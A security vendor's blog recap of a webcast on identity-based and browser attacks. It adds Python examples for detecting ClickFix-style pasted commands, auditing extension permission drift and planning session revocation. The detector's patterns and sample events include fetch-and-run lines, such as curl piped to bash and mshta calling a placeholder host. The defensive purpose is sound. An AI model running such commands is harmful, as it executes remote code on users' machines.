
What we learned from 'Security Theater vs. Security That Works' with Matt Johansen

Daniel Park · May 21, 2026 · 11 min read

In the final installment of our State of Browser Attacks series, Push Field CTO Mark Orlando sat down with Matt Johansen, security veteran, former Reddit security lead, and founder of the Vulnerable U newsletter, to talk about what's actually working in security and what's just theatre. Here are seven takeaways from the conversation.

1. Hackers don't hack in, they log in

Matt made the point early on that "the modern web frameworks that have come out have done more to shift application security than any security vendor ever did." It's measurably harder to write exploitable code in 2026 than it was even five years ago, and the data reflects that — as Matt put it, "most hacks that we read about these days are actually logins, not actually hacks in terms of vulnerabilities." Attackers aren't breaking in — they're logging in.

The data backs this up across the board. CrowdStrike's 2026 Global Threat Report found that 82% of attack detections are now malware-free — no exploit, no payload, just access and legitimate functionality being abused. Google/Mandiant recently reported that identity issues were the initial access vector in 83% of cloud-related incidents.

And when you look at the economics, the shift makes obvious sense: a browser RCE goes for around $250,000, while a PhaaS kit rental runs about $1,000 per year and a bulk stolen credential list costs $15. For a rational attacker, identity abuse isn't just easier — it's orders of magnitude cheaper.

This isn't a new observation, but it's one that still hasn't fully landed in how most organizations allocate their security budgets. The bulk of enterprise security spending is still pointed at the endpoint and the network — tooling built for an era when the primary threat was malware and exploitation. The threat model has moved, and for a lot of organizations, the stack hasn't moved with it.


2. AI is a force multiplier, but it isn't a super hacker

The Mythos discourse has been hard to escape. As Matt put it, the view that "the AI super hacker has escaped the lab" is "not actually what's going on." What's actually happening is that AI models trained to understand code are turning out to be very good at finding specific types of vulnerabilities in predominantly legacy codebases — but defenders stand to gain a lot too.

As Matt referenced, Google's CISO Heather Adkins said on stage at the Unprompted conference that Google's stated goal is "to eliminate all software vulnerabilities, period." And browser zero-days already hit a historic low at just 9% of all zero-days reported to Google in 2025.

But won't AI-assisted vulnerability discovery eventually make browser exploits cheaper for attackers too? Perhaps — but it will simultaneously make them easier for browser vendors to find and patch, and vendors like Google and Microsoft have the engineering capacity and financial incentive to scale AI-driven remediation far faster than attackers can scale exploit development.

As Matt noted, "they didn't train these models to be good at cybersecurity — they just trained them to get better and better at code," and big tech vendors like Google have the resources to really invest in these tools. The rational play for attackers is the same one it's been for years: skip the exploit development entirely and steal identities and sessions in the browser instead.


3. MFA is essential — but it isn't a silver bullet

Nobody's arguing against MFA. It's one of the most important security controls any organization can deploy, and both Matt and Mark were clear about that. But the conversation surfaced something that doesn't get enough attention: there are always gaps in coverage, and attackers have consistently found ways under, over, or through it.

Mark observed that every organization he talks to says they're in the process of "rolling out" MFA. It's always in progress, never complete — there's always an app that doesn't support it, a legacy system that can't handle it, a user population that hasn't been migrated, or a SaaS vendor charging extra for the privilege (the security tax). Coverage gaps are the norm, not the exception.

Then there's the bypass evolution. Matt walked through the history — SMS and SIM swapping, push notifications and push fatigue, and now AiTM kits that proxy the entire authentication flow, capturing both the password and the MFA token in a single attack. Every step up the MFA ladder, attackers have found a way around. Phishing-resistant methods like hardware tokens and passkeys are a meaningful improvement, but rollout is slow and uneven.

And then there's the class of attacks that sidestep authentication entirely. Consent phishing, device code phishing, session hijacking — these are all post-authentication attacks. The user has already authenticated successfully, the MFA did its job, and the attacker is going after what comes after: OAuth tokens, session cookies, consent grants. Matt compared these to zero-days for identity — they bypass the entire front end of your defensive stack. MFA is absolutely something you should be rolling out and strengthening, but it's one layer in what needs to be a deeper defense.


Check out our Browser & Identity Attacks Matrix for a comprehensive overview of attack techniques in a MITRE-inspired matrix. Browser and identity-based techniques have exploded since we first launched it.

4. User training is not enough: better technical controls are required

Matt was blunt on this one: "If those tips worked, cybersecurity as a profession would be out of business." 20+ years of user awareness training, and phishing is arguably more effective than ever. The standard advice — hover over links, check the sender, look for typos — assumes a level of sustained vigilance that no human can maintain across every interaction, every day.

What made his point land was the contrast between the comment sections on his ClickFix content — "Who the hell would fall for this?" — and the reality that every incident response professional he knows is currently working a ClickFix case. The people saying nobody would fall for it are not the people cleaning up after it.

Matt also brought up the recent Lazarus group fake job scams: threat actors spending six months building trust with a target — meeting in person at conferences, multiple times — before eventually getting them to install a malicious browser extension during a Zoom call. All of the social engineering that precedes the actual compromise is just trust-building, and the sophistication of that trust-building is increasing faster than any training program can keep up with. You need defensive layers that don't depend on the user making the right call every single time.


5. Every IR pro you know is working a ClickFix case

ClickFix came up repeatedly, and for good reason — it's one of the most common initial access vectors being reported right now. Matt said he doesn't know a single IR professional in his network who "isn't actively working a ClickFix-related case." The technique, which tricks users into copying and pasting malicious commands, has spawned an entire family of variants (InstallFix, ConsentFix, and others), and they're evolving fast.

Matt shared a particularly good example of why the "just don't fall for it" advice falls apart. Attackers were paying for ads promoting ChatGPT chat history links on technical search queries — things like "how to clean up disk space on Mac." The top result was a legitimate-looking ChatGPT interface with what appeared to be helpful terminal commands.

The user was already looking for commands to copy and paste into their terminal. The attack didn't need to trick them into doing something unusual — it just showed up in the exact context where copy-pasting commands was the expected behavior.

The new variants keep appearing because the underlying technique is modular — the trust-building wrapper changes (fake CAPTCHAs, fake error messages, fake install instructions, fake AI chat interfaces), but the core mechanic is the same. What makes it dangerous is that each new wrapper goes quasi-viral among attackers when it proves successful, which means the window between a new variant appearing and widespread adoption is very short.
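Because the wrapper changes but the core mechanic (a user pastes a command that pulls remote content straight into an interpreter) stays the same, the most durable place to catch ClickFix is process-creation telemetry rather than the lure itself. The detector below is an added example written for this recap, not code from Push Security or from the webcast. The event schema, the field names, the interpreter and parent-process lists, and the five sample events are all constructed for illustration; the regexes encode the generic fetch-and-execute shape, not any specific campaign.

```python
"""Flag ClickFix-style pasted commands in process-creation events (added example, constructed data)."""
import re
from typing import Dict, List, Tuple

# Interpreters a pasted command ends up in: Windows Run dialog -> powershell/cmd/mshta,
# macOS/Linux Terminal -> sh/bash/zsh. Constructed list for the example.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "sh", "bash", "zsh"}

# Parents that mean a person typed or pasted the command, rather than a scheduled script.
INTERACTIVE_PARENTS = {"explorer.exe", "Terminal", "iTerm2"}

# Remote content handed straight to an interpreter without landing on disk as a reviewable file.
FETCH_EXEC_PATTERNS = [
    re.compile(r"(curl|wget)\b[^|]*\|\s*(sudo\s+)?(sh|bash|zsh)\b", re.I),
    re.compile(r"\b(iex|invoke-expression)\b.*\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I),
    re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b.*\|\s*(iex|invoke-expression)\b", re.I),
    re.compile(r"mshta(\.exe)?\s+https?://", re.I),
]
# Encoding that keeps the pasted text from being readable by the person pasting it.
ENCODED_PATTERN = re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I)


def score_event(event: Dict[str, str]) -> List[str]:
    """Return the reasons this event looks like a pasted ClickFix command (empty list = benign)."""
    reasons: List[str] = []
    image = event["image"].rsplit("/", 1)[-1].rsplit("\\", 1)[-1]   # basename on either OS
    if image not in INTERPRETERS:
        return reasons
    cmd = event["cmdline"]
    if any(p.search(cmd) for p in FETCH_EXEC_PATTERNS):
        reasons.append("remote content piped directly into an interpreter")
    if ENCODED_PATTERN.search(cmd):
        reasons.append("encoded command line")
    # Interactivity alone is not suspicious; it only sharpens a hit we already have.
    if reasons and event["parent"] in INTERACTIVE_PARENTS:
        reasons.append(f"launched interactively from {event['parent']}")
    return reasons


def flag_events(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Run the rule over a batch of events and keep only the hits, with their reasons."""
    flagged = []
    for e in events:
        reasons = score_event(e)
        if reasons:
            flagged.append((e["id"], reasons))
    return flagged


# Constructed sample telemetry. Hosts use the reserved .invalid TLD; the encoded payload is a placeholder.
SAMPLE_EVENTS = [
    {"id": "e1", "parent": "explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand AAAA"},
    {"id": "e2", "parent": "Terminal", "image": "/bin/bash",
     "cmdline": 'bash -c "curl -fsSL http://example.invalid/cleanup.sh | bash"'},   # the "clean up disk space" lure
    {"id": "e3", "parent": "Terminal", "image": "/bin/bash",
     "cmdline": 'bash -c "df -h && du -sh ~/Library/Caches"'},                    # what the user actually wanted
    {"id": "e4", "parent": "services.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},         # scheduled task, benign
    {"id": "e5", "parent": "explorer.exe", "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/verify"},
]

if __name__ == "__main__":
    for event_id, reasons in flag_events(SAMPLE_EVENTS):
        print(event_id, "->", "; ".join(reasons))
```

The rule deliberately ignores the lure (CAPTCHA page, fake error, fake chat transcript) and keys on what the pasted text does, which is what survives each new wrapper. Expect it to also fire on legitimate `curl | sh` installers typed by developers; the interactive-parent reason is there so an analyst can triage those quickly rather than to suppress them.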

6. Browser extensions are the threat that never went away (and it's a bigger problem than ever)

Browser extensions are a topic we've covered in depth before, and Matt's perspective reinforced why. His first conference talk — Black Hat and DEF CON in 2011 — was about Chrome extension security. As he put it: "I could give that talk right now with very few changes to the slides and it would still be extremely relevant."

The core problem hasn't moved: extensions need broad permissions to function, even for completely legitimate use cases. A password manager needs to read login forms on every website. A dark mode extension needs to modify the DOM on every page. An RSS reader needs access to arbitrary sites. These aren't excessive permissions — they're the minimum required for the extension to do what it advertises.

What's making it worse is the AI adoption wave. Many AI tools ship with browser extension counterparts, and employees are installing them alongside the apps themselves — often without approval. The broader rush to adopt AI tooling is acting as a force multiplier for the shadow SaaS problem that security teams have been struggling with for years, and extensions are a big part of that.

The ways extensions get compromised vary. Users still get tricked into installing something malicious from the start, but legitimate extensions also turn malicious after the fact. Matt outlined several mechanisms: developer accounts getting compromised and attackers pushing malicious updates to the existing user base; extension developers accepting monetization deals that turn out to be data-harvesting operations; and threat actors outright purchasing extensions with established user bases and then pushing malware to them.

The Chrome Web Store doesn't solve this. Matt noted that he uploaded a proof-of-concept extension literally called "Malicious Extension" and it made it onto the store. There's some review process, but it's not real-time, it's not continuous, and it doesn't cover updates after initial submission.

Even organizations with a formal extension approval process typically only look at the extension once — at install time. Nobody's reviewing every update to every approved extension. And the risk assessment? "It's mostly based on vibes. There's very little science here." Even at organizations with mature security programs, Matt hasn't seen many that have real-time, ongoing visibility into what's happening inside their employees' browser extensions.
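One way to replace "vibes" with something repeatable, and to catch an update that quietly widens an extension's reach after the one-time approval, is to audit the manifest that ships with each version and diff it against the version that was approved. The script below is an added example for this recap, not code from Push Security, the webcast, or any browser vendor. The two manifests are constructed (a hypothetical dark-mode extension before and after an update), and the permission weights are an illustrative assumption rather than a vendor classification.

```python
"""Audit an extension manifest for broad reach and detect drift since approval (added example, constructed data)."""
import json
from typing import Dict, Set

# Host patterns that mean "every site the user visits".
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*", "file:///*"}

# API permissions that let an extension read or alter what the user does. Weights are an assumption.
SENSITIVE_PERMISSIONS = {
    "webRequest": 2, "webRequestBlocking": 3, "cookies": 3, "history": 2, "tabs": 1,
    "scripting": 2, "debugger": 4, "nativeMessaging": 3, "clipboardRead": 2, "downloads": 1,
}


def host_scope(manifest: dict) -> Set[str]:
    """Every host the extension may touch: host_permissions (MV3), host entries inside
    'permissions' (MV2 style) and content-script match patterns."""
    hosts = set(manifest.get("host_permissions", []))
    hosts |= {p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>"}
    for cs in manifest.get("content_scripts", []):
        hosts |= set(cs.get("matches", []))
    return hosts


def api_permissions(manifest: dict) -> Set[str]:
    """Non-host entries of 'permissions', i.e. the browser APIs the extension can call."""
    return {p for p in manifest.get("permissions", []) if "://" not in p and p != "<all_urls>"}


def risk_score(manifest: dict) -> int:
    """Illustrative score: weighted API permissions plus a flat penalty for running on every site."""
    score = sum(SENSITIVE_PERMISSIONS.get(p, 0) for p in api_permissions(manifest))
    if host_scope(manifest) & BROAD_HOST_PATTERNS:
        score += 5   # the "minimum required" case for a dark-mode tool, but still full exposure
    return score


def drift(approved: dict, installed: dict) -> Dict[str, object]:
    """What the installed version can do that the approved one could not. Empty dict = no new reach."""
    changes: Dict[str, object] = {}
    new_hosts = host_scope(installed) - host_scope(approved)
    new_perms = api_permissions(installed) - api_permissions(approved)
    if new_hosts:
        changes["new_hosts"] = sorted(new_hosts)
    if new_perms:
        changes["new_permissions"] = sorted(new_perms)
    delta = risk_score(installed) - risk_score(approved)
    if delta > 0:
        changes["risk_delta"] = delta
    return changes


def audit(approved_json: str, installed_json: str) -> Dict[str, object]:
    """Parse both manifests and report approved score, installed score and the drift between them."""
    approved, installed = json.loads(approved_json), json.loads(installed_json)
    return {
        "name": installed.get("name"),
        "approved_version": approved.get("version"),
        "installed_version": installed.get("version"),
        "approved_score": risk_score(approved),
        "installed_score": risk_score(installed),
        "drift": drift(approved, installed),
    }


# Constructed manifests for a hypothetical dark-mode extension. Version 1.2.0 was approved; 1.3.0 is
# what the update channel delivered. Host reach is unchanged (it already ran on every page), but the
# update added cookie and web-request access, which a once-at-install review would never see.
APPROVED_MANIFEST = json.dumps({
    "manifest_version": 3, "name": "Example Dark Mode", "version": "1.2.0",
    "permissions": ["storage"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["dark.js"]}],
})
INSTALLED_MANIFEST = json.dumps({
    "manifest_version": 3, "name": "Example Dark Mode", "version": "1.3.0",
    "permissions": ["storage", "cookies", "webRequest"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["dark.js"]}],
})

if __name__ == "__main__":
    print(json.dumps(audit(APPROVED_MANIFEST, INSTALLED_MANIFEST), indent=2))
```

Running this on every update, not only at install, turns the approval into a continuous check: the host scope is identical in both versions, so a reviewer eyeballing the store listing would see nothing new, yet the API permissions now cover cookies and request interception, which is exactly the shape of the monetization and account-takeover scenarios Matt describes.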


7. You have 30 minutes to respond to a cloud intrusion — and revoking the token isn't enough

Matt was direct about the speed benchmark practitioners should be targeting: meaningful containment and eradication within about 30 minutes, because attackers are partially achieving their objectives in 20 to 40 minutes and significantly past the point of no return within an hour.

The data supports this picture. CrowdStrike reports that the average e-crime "breakout time" (moving from initial access to high-value assets) is now just 29 minutes, while Google reports that the median time between initial access and hand-off to a secondary group has collapsed from over 8 hours in 2022 to just 22 seconds in 2025 — pointing to a highly automated, interconnected, and professionalized threat actor ecosystem.

But speed alone isn't the problem Matt emphasized — it's that the containment actions practitioners think they have don't actually work the way they expect. His anecdote about revoking an IdP OAuth token and assuming the session was killed, only to discover that the 200 downstream SaaS session tokens were still live, will resonate with anyone who has worked an identity-based incident.

You can't move that fast if you're figuring out what your tools can and can't do during the incident. The teams that handle these situations well are the ones that have taken stock of their actual capabilities beforehand — what their IdP revokes, what it doesn't, which SaaS apps have independent session management, where the gaps are. The teams that don't are the ones at "1 AM with a pager in hand going, 'What the hell do I do now?'" as Matt described it. "Ask me how I know."
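Taking stock of what an IdP revocation actually kills can be done as a table before the incident, and the table can be queried when the pager goes off. The model below is an added example written for this recap, not code from Push Security or the webcast. The session inventory is constructed, and the per-app behaviour (whether the app re-checks the IdP before honouring its own token, how long that token lives, whether the app exposes its own revoke path) is an illustrative assumption; the real values have to come from each IdP and SaaS vendor, which is the point of doing the inventory in advance.

```python
"""Model which downstream sessions survive an IdP revocation and how long the attacker keeps access
(added example, constructed inventory)."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

CONTAINMENT_TARGET = timedelta(minutes=30)   # the benchmark Matt gives in the conversation


@dataclass
class AppSession:
    app: str
    user: str
    issued_at: datetime
    lifetime: timedelta            # validity of the app's own session token once issued
    revalidates_with_idp: bool     # does the app re-check IdP state before honouring its token? (assumed per app)
    has_own_revoke_api: bool       # can the session be killed at the app directly? (assumed per app)


def revoke_at_idp(sessions: List[AppSession], user: str) -> Tuple[List[AppSession], List[AppSession]]:
    """Simulate revoking the user's IdP session/OAuth token.
    Only apps that re-check the IdP drop their sessions; the rest keep running on their own tokens."""
    killed = [s for s in sessions if s.user == user and s.revalidates_with_idp]
    still_live = [s for s in sessions if s.user == user and not s.revalidates_with_idp]
    return killed, still_live


def residual_exposure(still_live: List[AppSession], now: datetime) -> timedelta:
    """Longest remaining validity among the surviving sessions, i.e. how long access persists if nothing else is done."""
    if not still_live:
        return timedelta(0)
    return max(s.issued_at + s.lifetime - now for s in still_live)


def containment_plan(sessions: List[AppSession], user: str, now: datetime) -> Dict[str, object]:
    """IdP revocation first, then one concrete action per surviving session, plus whether the
    residual exposure fits inside the 30-minute target."""
    killed, live = revoke_at_idp(sessions, user)
    steps = [f"IdP revoke cleared {len(killed)} session(s): {', '.join(s.app for s in killed) or 'none'}"]
    for s in live:
        remaining = s.issued_at + s.lifetime - now
        if s.has_own_revoke_api:
            steps.append(f"{s.app}: revoke via the app's own admin API (token otherwise valid for {remaining})")
        else:
            steps.append(f"{s.app}: no revoke path; disable the user in-app and rotate secrets (token valid for {remaining})")
    exposure = residual_exposure(live, now)
    return {
        "killed": killed,
        "live": live,
        "exposure": exposure,
        "within_target": exposure <= CONTAINMENT_TARGET,
        "steps": steps,
    }


# Constructed inventory: every token was issued ten minutes before the incident call.
NOW = datetime(2026, 5, 20, 1, 0, 0)
ISSUED = NOW - timedelta(minutes=10)
SESSIONS = [
    AppSession("idp-portal", "alice", ISSUED, timedelta(hours=8), revalidates_with_idp=True, has_own_revoke_api=True),
    AppSession("mail-saas", "alice", ISSUED, timedelta(hours=1), revalidates_with_idp=True, has_own_revoke_api=True),
    AppSession("crm-saas", "alice", ISSUED, timedelta(hours=24), revalidates_with_idp=False, has_own_revoke_api=True),
    AppSession("wiki-saas", "alice", ISSUED, timedelta(days=7), revalidates_with_idp=False, has_own_revoke_api=False),
    AppSession("crm-saas", "bob", ISSUED, timedelta(hours=24), revalidates_with_idp=False, has_own_revoke_api=True),
]

if __name__ == "__main__":
    plan = containment_plan(SESSIONS, "alice", NOW)
    for step in plan["steps"]:
        print(step)
    print("residual exposure:", plan["exposure"], "| within 30-minute target:", plan["within_target"])
```

With this inventory the IdP revoke clears two of alice's four sessions, and the surviving wiki token keeps the attacker inside for almost a week unless someone acts at the app itself. The useful output is not the simulation but the per-app column values: once those are filled in for real, the plan is a lookup rather than a 1 AM discovery.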


This post is a recap of Security theatre vs. security that works, the third episode in Push Security's webcast series on the state of browser attacks. Watch the full recording for the complete conversation, including live Q&A with Mark and Matt.


Push Security is the most powerful AI-native security tool in the browser. Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required.

Security teams use Push to detect and stop advanced browser-based attacks like AiTM phishing, ClickFix, and session hijacking; gain visibility and control over AI tool usage across their workforce; harden identities by surfacing credential reuse, SSO gaps, and shadow IT; and support data loss and insider investigations with browser-layer telemetry that other tools can't see.

Book a live demo to learn more.

About the author: Daniel Park, Technical Content